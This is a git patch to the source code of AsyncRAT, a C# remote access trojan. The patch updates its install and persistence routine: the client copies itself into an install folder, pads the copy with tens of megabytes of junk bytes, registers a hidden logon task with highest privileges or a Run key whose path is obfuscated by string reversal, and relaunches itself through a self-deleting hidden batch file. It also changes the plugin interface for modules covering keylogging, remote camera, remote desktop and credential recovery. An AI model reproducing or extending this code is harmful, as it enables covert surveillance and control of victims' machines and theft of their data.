From b71f320fd0f0772cf8afd0f4990e69e6813290fd Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Fri, 4 Oct 2019 07:13:19 +0300 Subject: [PATCH] Update --- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 2 +- AsyncRAT-C#/Client/Install/NormalStartup.cs | 39 ++++++++++++------- AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs | 2 +- AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs | 2 +- .../Plugin/FileManager/FileManager/Plugin.cs | 3 +- .../Plugin/LimeLogger/LimeLogger/Plugin.cs | 2 +- .../Miscellaneous/Miscellaneous/Plugin.cs | 2 +- .../Options/Options/Handler/HandleUAC.cs | 3 +- .../Options/Handler/HandleUninstall.cs | 10 ++++- AsyncRAT-C#/Plugin/Options/Options/Plugin.cs | 3 +- .../ProcessManager/ProcessManager/Plugin.cs | 2 +- .../Plugin/Recovery/Recovery/Plugin.cs | 3 +- .../RemoteCamera/RemoteCamera/Plugin.cs | 2 +- .../RemoteDesktop/RemoteDesktop/Plugin.cs | 2 +- .../SendFile/Handler/HandleUninstall.cs | 6 ++- .../Plugin/SendFile/SendFile/Plugin.cs | 3 +- 16 files changed, 52 insertions(+), 34 deletions(-) diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 96c7d44..9dfa87d 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -36,7 +36,7 @@ namespace Client.Handle_Packet Assembly assembly = AppDomain.CurrentDomain.Load(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)))); Type type = assembly.GetType("Plugin.Plugin"); dynamic instance = Activator.CreateInstance(type); - instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install, Settings.InstallFile); + instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install); break; } diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index e8bee7c..47e6676 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -15,8 +15,8 @@ namespace Client.Install { try { - string installfullpath = Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile); - if (Process.GetCurrentProcess().MainModule.FileName != installfullpath) + FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile)); + if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName) { for (int i = 0; i < 10; i++) @@ -28,13 +28,10 @@ namespace Client.Install { try { - if (P.MainModule.FileName == installfullpath) + if (P.MainModule.FileName == installPath.FullName) P.Kill(); } - catch - { - Debug.WriteLine("NormalStartup Error : " + P.ProcessName); - } + catch { } } if (Methods.IsAdmin()) { @@ -43,7 +40,7 @@ namespace Client.Install StartInfo = new ProcessStartInfo { FileName = "schtasks.exe", - Arguments = "/create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Settings.InstallFile + @"""'" + " /tr " + @"""'" + installfullpath + @"""'", + Arguments = "/create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Path.GetFileNameWithoutExtension(installPath.FullName) + @"""'" + " /tr " + @"""'" + installPath.FullName + @"""'", WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, } @@ -54,17 +51,17 @@ namespace Client.Install { using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree)) { - key.SetValue(Settings.InstallFile, "\"" + installfullpath + "\""); + key.SetValue(Path.GetFileNameWithoutExtension(installPath.FullName), "\"" + installPath.FullName + "\""); } } FileStream fs; - if (File.Exists(installfullpath)) + if (File.Exists(installPath.FullName)) { - File.Delete(installfullpath); + File.Delete(installPath.FullName); Thread.Sleep(1000); } - fs = new FileStream(installfullpath, FileMode.CreateNew); + fs = new FileStream(installPath.FullName, FileMode.CreateNew); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); fs.Write(clientExe, 0, clientExe.Length); byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)]; @@ -72,8 +69,24 @@ namespace Client.Install fs.Write(junk, 0, junk.Length); fs.Dispose(); - Process.Start(installfullpath); Methods.ClientExit(); + string batch = Path.GetTempFileName() + ".bat"; + using (StreamWriter sw = new StreamWriter(batch)) + { + sw.WriteLine("@echo off"); + sw.WriteLine("timeout 3 > NUL"); + sw.WriteLine("START " + "\"" + "\" " + "\"" + installPath.FullName + "\""); + sw.WriteLine("CD " + Path.GetTempPath()); + sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q"); + } + Process.Start(new ProcessStartInfo() + { + FileName = batch, + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = false, + WindowStyle = ProcessWindowStyle.Hidden + }); Environment.Exit(0); } } diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs index 9fec2d9..f361f55 100644 --- a/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs +++ b/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs @@ -13,7 +13,7 @@ namespace Plugin public class Plugin { public static Socket Socket; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); Socket = socket; diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs index 0a440aa..32e717c 100644 --- a/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs +++ b/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs @@ -14,7 +14,7 @@ namespace Plugin public class Plugin { public static Socket Socket; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); Socket = socket; diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs index 5bc9da7..a59807f 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs @@ -20,14 +20,13 @@ namespace Plugin public static string Install; public static string InstallFile; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); AppMutex = mutex; Mutex = mtx; BDOS = bdos; Install = install; - InstallFile = installFile; Socket = socket; Connection.ServerCertificate = certificate; Connection.Hwid = hwid; diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs index 9fec2d9..f361f55 100644 --- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs @@ -13,7 +13,7 @@ namespace Plugin public class Plugin { public static Socket Socket; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); Socket = socket; diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs index 0a440aa..32e717c 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs @@ -14,7 +14,7 @@ namespace Plugin public class Plugin { public static Socket Socket; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); Socket = socket; diff --git a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs index 3c48c07..4381a2b 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs +++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs @@ -3,6 +3,7 @@ using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; +using System.Windows.Forms; namespace Plugin.Handler { @@ -19,7 +20,7 @@ namespace Plugin.Handler StartInfo = new ProcessStartInfo { FileName = "cmd", - Arguments = "/k START \"\" \"" + Process.GetCurrentProcess().MainModule.FileName + "\" & EXIT", + Arguments = "/k START \"\" \"" + Application.ExecutablePath + "\" & EXIT", WindowStyle = ProcessWindowStyle.Hidden, Verb = "runas", UseShellExecute = true diff --git a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs index 2602919..725805e 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs +++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs @@ -18,13 +18,13 @@ namespace Plugin.Handler try { if (!Methods.IsAdmin()) - Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile); + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Path.GetFileNameWithoutExtension(Application.ExecutablePath)); else { Process.Start(new ProcessStartInfo() { FileName = "schtasks", - Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'", + Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'", CreateNoWindow = true, ErrorDialog = false, UseShellExecute = false, @@ -35,6 +35,12 @@ namespace Plugin.Handler catch { } } + try + { + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid); + } + catch { } + string batch = Path.GetTempFileName() + ".bat"; using (StreamWriter sw = new StreamWriter(batch)) { diff --git a/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs b/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs index 5bc9da7..a59807f 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs +++ b/AsyncRAT-C#/Plugin/Options/Options/Plugin.cs @@ -20,14 +20,13 @@ namespace Plugin public static string Install; public static string InstallFile; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); AppMutex = mutex; Mutex = mtx; BDOS = bdos; Install = install; - InstallFile = installFile; Socket = socket; Connection.ServerCertificate = certificate; Connection.Hwid = hwid; diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs index 9fec2d9..f361f55 100644 --- a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs +++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs @@ -13,7 +13,7 @@ namespace Plugin public class Plugin { public static Socket Socket; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); Socket = socket; diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs index 5bc9da7..a59807f 100644 --- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs +++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs @@ -20,14 +20,13 @@ namespace Plugin public static string Install; public static string InstallFile; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); AppMutex = mutex; Mutex = mtx; BDOS = bdos; Install = install; - InstallFile = installFile; Socket = socket; Connection.ServerCertificate = certificate; Connection.Hwid = hwid; diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs index 9fec2d9..f361f55 100644 --- a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs +++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs @@ -13,7 +13,7 @@ namespace Plugin public class Plugin { public static Socket Socket; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); Socket = socket; diff --git a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs index 9fec2d9..f361f55 100644 --- a/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs +++ b/AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs @@ -13,7 +13,7 @@ namespace Plugin public class Plugin { public static Socket Socket; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); Socket = socket; diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs index 8b36cb4..3a211d9 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs @@ -18,13 +18,13 @@ namespace Plugin.Handler try { if (!Methods.IsAdmin()) - Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile); + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Path.GetFileNameWithoutExtension(Application.ExecutablePath)); else { Process.Start(new ProcessStartInfo() { FileName = "schtasks", - Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'", + Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'", CreateNoWindow = true, ErrorDialog = false, UseShellExecute = false, @@ -35,6 +35,8 @@ namespace Plugin.Handler catch { } } + Registry.CurrentUser.CreateSubKey(@"", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid); + string batch = Path.GetTempFileName() + ".bat"; using (StreamWriter sw = new StreamWriter(batch)) { diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs index 5bc9da7..a59807f 100644 --- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs +++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs @@ -20,14 +20,13 @@ namespace Plugin public static string Install; public static string InstallFile; - public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile) + public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install) { Debug.WriteLine("Plugin Invoked"); AppMutex = mutex; Mutex = mtx; BDOS = bdos; Install = install; - InstallFile = installFile; Socket = socket; Connection.ServerCertificate = certificate; Connection.Hwid = hwid;